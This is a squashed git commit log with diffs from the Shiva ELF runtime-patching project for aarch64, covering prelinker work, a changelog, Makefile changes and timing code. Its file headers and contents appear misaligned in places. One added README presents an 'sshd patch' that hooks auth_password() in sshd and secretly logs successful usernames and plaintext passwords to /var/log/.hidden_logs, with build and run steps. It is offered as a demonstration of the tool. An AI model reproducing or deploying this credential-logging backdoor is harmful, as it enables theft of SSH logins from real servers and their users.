Squashed commit of the following:

commit aed157c
Author: elfmaster <ryan@bitlackeys.org>
Date:   Tue Oct 3 18:17:35 2023 -0700

    added sshd patch prelink, updated sshd-patch makefile, and fixed a slight bug in shiva_callsite.c that is technically wrong but would never crash

commit 72692ad
Author: elfmaster <ryan@bitlackeys.org>
Date:   Mon Oct 2 19:59:01 2023 -0700

    new updates to shiva_user_manual, CHANGELOG added, several incidental patch build changes

commit 3f150d0
Author: elfmaster <ryan@bitlackeys.org>
Date:   Fri Sep 29 13:55:44 2023 -0700

    prelink v2. draft-1 finished

commit e6829e3
Author: elfmaster <ryan@bitlackeys.org>
Date:   Thu Sep 28 19:13:09 2023 -0700

    fixed crash when applying transforms. The branch_new->insn_string in shiva_analyze.c was invalid as it had not been set to its string table value.

commit 4f4d682
Author: elfmaster <ryan@bitlackeys.org>
Date:   Thu Sep 28 18:59:40 2023 -0700

    added progress bar, still working on --disable-cfg option

commit fd21584
Author: elfmaster <ryan@bitlackeys.org>
Date:   Wed Sep 27 17:54:35 2023 -0700

    added SPEED_TEST definitions for performance testing the shiva_analyze_run function

commit b0ca1e6
Author: elfmaster <ryan@bitlackeys.org>
Date:   Tue Sep 26 09:55:09 2023 -0700

    shiva pre-linking CFG data via xref and branch sections now works!

commit 83d0e09
Author: elfmaster <ryan@bitlackeys.org>
Date:   Fri Sep 22 12:04:53 2023 -0700

    some good headway, shiva is nearly able to extract the branch and xref data from the target binary in a meaningful way

commit 7ae3eb5
Author: elfmaster <ryan@bitlackeys.org>
Date:   Fri Sep 22 11:07:37 2023 -0700

    shiva now reads in the .xref and .branch meta-data

commit 58c0923
Author: elfmaster <ryan@bitlackeys.org>
Date:   Wed Sep 20 14:22:59 2023 -0700

    shiva-ld now stores all of the correct cfg data into the new added sections

commit 58f792d
Author: elfmaster <ryan@bitlackeys.org>
Date:   Wed Sep 20 12:59:28 2023 -0700

    The 3 new section headers are now properly showing up as I have properly adjusted the order in which various parts of the ELF structures are modified and written to disk

commit 9005024
Author: elfmaster <ryan@bitlackeys.org>
Date:   Thu Sep 14 17:17:45 2023 -0700

    the section header table is accessible now

commit 83c610f
Author: elfmaster <ryan@bitlackeys.org>
Date:   Tue Sep 12 10:34:08 2023 -0700

    writes out 3 new shdrs, writes out new strtab table into new segment

commit ee9cf0d
Author: elfmaster <ryan@bitlackeys.org>
Date:   Mon Sep 11 19:20:42 2023 -0700

    in progress...

commit 42f29fb
Author: elfmaster <ryan@bitlackeys.org>
Date:   Wed Sep 6 22:05:17 2023 -0700

    still working on getting all of the new sections added, and existing shdr table and string tables updated.

commit a81203f
Author: elfmaster <ryan@bitlackeys.org>
Date:   Tue Sep 5 14:23:55 2023 -0700

    in progress. having to modify .shstrtab, add new section headers, and create several new dynamic segment entries.

commit 0cc4e41
Author: elfmaster <ryan@bitlackeys.org>
Date:   Wed Aug 9 07:32:34 2023 -0700

    updated name variable from uint32_t to size_t in struct __elf_symbol in shiva-ld.c -- this way the index pointer (Although it only needs to be 32bits) is the same as a pointer width, like the original struct elf_symbol in libelfmaster

commit 23edf37
Author: elfmaster <ryan@bitlackeys.org>
Date:   Sun Aug 6 16:01:19 2023 -0700

    cfg generated and .shiva.strtab is setup. Still need to write this data into the appropriate new ELF sections: .shiva.cfg and .shiva.strtab, which will be included right after the new PT_DYNAMIC segment

commit 4b62f56
Author: elfmaster <ryan@bitlackeys.org>
Date:   Fri Aug 4 18:47:00 2023 -0700

    removed analyze.c

commit b6d5e3f
Author: elfmaster <ryan@bitlackeys.org>
Date:   Fri Aug 4 14:51:58 2023 -0700

    added first draft of cfg code into shiva-prelinker. not yet tested.

Author: elfmaster

CHANGELOG.md

@@ -0,0 +1,20 @@
+# Shiva CHANGELOG
+
+## v0.11 Alpha - 8/13/2023
+
+* First public release of Shiva
+
+
+## v0.12 Alpha - 10/2/2023
+
+* Finished Shiva Prelinker v2.0 (That's the "/usr/bin/shiva-ld" tool)
+	- See ticket: https://github.com/advanced-microcode-patching/shiva/issues/1
+	- Performance enhancements of up to 3000% tested
+	- Performance enhancement grows proportionate to size of .text section of executable
+	- --disable-cfg-gen flag which disables the new control-flow meta-data from shiva-ld
+* Updated the Shiva user manual: documentation/shiva_user_manual.pdf to v0.12 Alpha.
+* Extended Shiva's shiva_analyze.c code to support consumption of .shiva.xref and .shiva.branch sections.
+* Several incidental build changes the patches in modules/aarch64_patches
+* Added this CHANGELOG to the project.
+
+elfmaster [at] arcana-research.io

Makefile

@@ -46,7 +46,7 @@ install:
 	mkdir -p /opt/shiva/modules
 	cp $(PATCH_PATH)/*interposing*/*.o /opt/shiva/modules
 	cp $(PATCH_PATH)/cfs_patch1/*.o /opt/shiva/modules
-	cp $(PATCH_PATH)/amp_challenge10/*.o /opt/shiva/modules
+	cp $(PATCH_PATH)/bss_overflow/*.o /opt/shiva/modules
 	cat shiva.ansi
 clean:
 	rm -f *.o shiva

documentation/shiva_user_manual.pdf

@@ -4,7 +4,7 @@ SHIVA-LD_PATH="../../../tools/shiva-ld/shiva-ld"
 all:
 	gcc -mcmodel=large -fno-pic -I ../ -fno-stack-protector -c bss_patch.c
 	gcc -O0 test_bss.c -o test_bss
-	$(SHIVA-LD_PATH) -e test_bss -p bss_patch.o -i /lib/shiva -s /opt/shiva/modules -o test_bss.patched
+	$(SHIVA-LD_PATH) -e test_bss -p bss_patch.o -i /lib/shiva -s /opt/shiva/modules -o test_bss.patched 
 install:
 	cp bss_patch.o /opt/shiva/modules/
 clean:

modules/aarch64_patches/bss_interposing/Makefile

@@ -1,8 +1,11 @@
 INTERP_PATH="/lib/shiva"
 SHIVA-LD_PATH="../../../tools/shiva-ld/shiva-ld"
-
+all:
 	gcc -mcmodel=large -fno-pic -I ../ -fno-stack-protector -c bss_patch2.c
 	gcc -O0 -g bss_vuln.c -o bss_vuln
 	$(SHIVA-LD_PATH) -e bss_vuln -p bss_patch2.o -i /lib/shiva -s /opt/shiva/modules -o bss_vuln.patched
-	chown root:root bss_vuln
-	chmod u+s bss_vuln
+	#chown root:root bss_vuln
+	#chmod u+s bss_vuln
+clean:
+	rm -f *.o bss_vuln bss_vuln.patched
+

modules/aarch64_patches/bss_overflow/Makefile

@@ -2,6 +2,9 @@
 #include <stdlib.h>
 #include <stdio.h>
 #include <sys/stat.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
 
 #define MAX_LEN 32
 

modules/aarch64_patches/bss_overflow/bss_vuln.c

@@ -1,5 +1,6 @@
 INTERP_PATH="/lib/shiva"
 SHIVA-LD_PATH="../../../tools/shiva-ld/shiva-ld"
+all: patch prelink
 patch:
 	# Build the module ro_patch.c with a large code model
 	gcc -Wno-implicit-function-declaration -mcmodel=large -fno-pic -I ../../include -fno-stack-protector -c sshd_patch.c

modules/aarch64_patches/cfs_patch1/core-cpu1

@@ -0,0 +1,78 @@
+# sshd patch
+
+Turn Shiva into a friendly process memory backdoor that logs incoming usernames
+and passwords that are authenticated via the auth_password() function in the
+sshd binary.
+
+## Method
+
+Shiva installs a patch that hooks the function auth_password() within sshd. In
+this particular example sshd has it's local symbol table ".symtab" in-tact
+within the binary, and so we can write the patch by using symbol interposition
+on the auth_password() function, sshd_patch.c
+
+```
+int auth_password(struct ssh *ssh, const char *password)
+{
+	FILE *logfd;
+	int ret;
+	struct Authctxt *authctxt = ssh->authctxt;
+	struct passwd *pw = authctxt->pw;
+
+	logfd = fopen("/var/log/.hidden_logs", "a+");
+	fprintf(logfd, "auth_password hook called\n");
+
+	/*
+	 * call the original auth_password(ssh, password); by using
+	 * the SHIVA_HELPER_CALL_EXTERNAL macro.
+	 */
+	ret = SHIVA_HELPER_CALL_EXTERNAL_ARGS2(auth_password, ssh, password);
+	if (ret > 0) {
+		/*
+		 * If the real auth_password() succeeded, then log
+		 * the username and password to "/var/log/.hidden_logs"
+		 */
+		fprintf(logfd, "Successful SSH login\n"
+		    "Username: %s\n"
+		    "Password: %s\n", pw->pw_name, password);
+	}
+	fclose(logfd);
+	return ret;
+}
+```
+
+## A note on patching stripped binaries
+
+Shiva relies on libelfmaster for symbol table reconstruction of stripped
+binaries, which internally parses the PT_GNU_EH_FRAME segment in the ELF binary to
+reconstruct the symbols for the .text section. In the Linux aarch64 environment
+that I'm developing in (Ubuntu 18.04.6 LTS) I have not seen any ELF binaries that
+have the any data in their .eh_frame section, and a PT_GNU_EH_FRAME segment
+simply doesn't exist in the ones that I've observed. The original version
+of Shiva was for x86_64 (Found at https://github.com/elfmaster/shiva) and this
+works with function symbol table reconstruction, therefore allowing a developer
+to patch the sshd binary even if it was stripped. The developer would need to
+first determine the address of where the auth_password() function is within the
+binary. libelfmaster would internally generate a symbol, i.e: "fn_0x4002f3" and
+so the patch developer would simply interpose the function by re-writing it, i.e.
+```
+int fn_0x4002f3(struct ssh *ssh, const char *password)
+{
+	/*
+	 * new code here
+         */
+}
+
+
+## A note on ELF runtime infection
+
+This type of process-memory function hooking would typically be done either
+on-disk to the ELF binary directly or in memory via `__libc_dlopen_mode` or
+PTRACE. Generally these techniques are non-trivial and require developers to
+write advanced tools that are thousands of lines of C code.
+
+## Use patch
+
+$ make
+$ sudo make install
+$ $PWD/sshd.patched -p 31337 -d

modules/aarch64_patches/sshd-patch/Makefile

@@ -1,4 +1,5 @@
 #include "shiva.h"
+#include <time.h>
 
 struct shiva_ctx *ctx_global;
 
@@ -113,11 +114,23 @@ shiva_interp_mode(struct shiva_ctx *ctx)
 		fprintf(stderr, "Warning: Found .text relocations in '%s'. This may alter"
 		    " the effects of breakpoints/instrumentation\n", elf_pathname(&ctx->elfobj));
 	}
-	
+
+#ifdef SPEED_TEST
+	struct timespec tv, tv2;
+	double elapsed_time;
+	clock_gettime(CLOCK_REALTIME, &tv);
+#endif
 	if (shiva_analyze_run(ctx) == false) {
 		fprintf(stderr, "Failed to run the analyzers\n");
-		return false;
+		exit(EXIT_FAILURE);
 	}
+#ifdef SPEED_TEST
+	clock_gettime(CLOCK_REALTIME, &tv2);
+	fprintf(stdout, "time to generate xref/branch data: %zu:%zu ms.\n", (size_t)tv2.tv_sec - (size_t)tv.tv_sec,
+	    (size_t)tv2.tv_nsec - (size_t)tv.tv_nsec);
+
+#endif
+
 	if (shiva_maps_build_list(ctx) == false) {
 		fprintf(stderr, "shiva_maps_build_list() failed\n");
 		return false;
@@ -156,6 +169,10 @@ shiva_interp_mode(struct shiva_ctx *ctx)
 			return false;
 		}
 	} else {
+		fprintf(stderr, "Shiva ELF Interpreter mode doesn't work without first using shiva-ld"
+		    " to prelink the target ELF binary\n");
+		return false;
+		/* XXX */
 		char *mpath = getenv("SHIVA_MODULE_PATH");
 		if (mpath != NULL) {
 			strcpy(ctx->module_path, mpath);
@@ -165,20 +182,20 @@ shiva_interp_mode(struct shiva_ctx *ctx)
 	}
 
 	/*
-         * Get the entry point of the target executable. Stored in AT_ENTRY
-         * of the auxiliary vector.
-         */
-        if (shiva_auxv_iterator_init(ctx, &auxv_iter, NULL) == false) {
-                fprintf(stderr, "shiva_auxv_iterator_init failed\n");
-                return false;
-        }
-        while (shiva_auxv_iterator_next(&auxv_iter, &auxv_entry) == SHIVA_ITER_OK) {
-                if (auxv_entry.type == AT_ENTRY) {
-                        ctx->ulexec.entry_point = auxv_entry.value;
-                        shiva_debug("[1] Entry point: %#lx\n", entry_point);
-                        break;
-                }
-        }
+	 * Get the entry point of the target executable. Stored in AT_ENTRY
+	 * of the auxiliary vector.
+	 */
+	if (shiva_auxv_iterator_init(ctx, &auxv_iter, NULL) == false) {
+		fprintf(stderr, "shiva_auxv_iterator_init failed\n");
+		return false;
+	}
+	while (shiva_auxv_iterator_next(&auxv_iter, &auxv_entry) == SHIVA_ITER_OK) {
+		if (auxv_entry.type == AT_ENTRY) {
+			ctx->ulexec.entry_point = auxv_entry.value;
+			shiva_debug("[1] Entry point: %#lx\n", entry_point);
+			break;
+		}
+	}
 	if (shiva_module_loader(ctx, ctx->module_path,
 	    &ctx->module.runtime, SHIVA_MODULE_F_RUNTIME) == false) {
 		fprintf(stderr, "shiva_module_loader failed\n");
@@ -413,14 +430,23 @@ int main(int argc, char **argv, char **envp)
 	 * into memory, we can run some analyzers on it to acquire
 	 * information (i.e. callsite locations).
 	 */
+#ifdef SPEED_TEST
+	struct timespec tv, tv2;
+	double elapsed_time;
+	clock_gettime(CLOCK_REALTIME, &tv);
+#endif
 	if (shiva_analyze_run(&ctx) == false) {
 		fprintf(stderr, "Failed to run the analyzers\n");
 		exit(EXIT_FAILURE);
 	}
+#ifdef SPEED_TEST
+	clock_gettime(CLOCK_REALTIME, &tv2);
+	fprintf(stdout, "time to generate xref/branch data: %zu:%zu ms.\n", (size_t)tv2.tv_sec - (size_t)tv.tv_sec,
+	    (size_t)tv2.tv_nsec - (size_t)tv.tv_nsec);
+#endif
 	/*
-	 * shiva_module_loader will load modules/shakti_module.o
-	 * into an executable region within our address space.
-	 * It will then pass control to the module.
+	 * This flag tells Shiva to ul_exec the target binary without installing
+	 * any patches at runtime.
 	 */
 	if (ctx.flags & SHIVA_OPTS_F_ULEXEC_ONLY)
 		goto transfer_control;
@@ -455,17 +481,6 @@ int main(int argc, char **argv, char **envp)
 		exit(EXIT_FAILURE);
 	}
 
-	/*
-	 * XXX: In the event that our module installed .got.plt hooks, we
-	 * must disable DT_BINDNOW before passing control to the RTLD, otherwise
-	 * our hooks will be overwritten by RTLD in strict linking mode.
-	 * We are basically disabling RELRO (read-only relocations) which is a
-	 * security issue. In the future we should inject PLT hooks purely by
-	 * injecting JUMPSLOT relocations.
-	 */
-	//(void) shiva_target_dynamic_set(&ctx, DT_FLAGS, 0);
-	//(void) shiva_target_dynamic_set(&ctx, DT_FLAGS_1, 0);
-
 	/*
 	 * Once the module has finished executing, we pass control
 	 * to LDSO.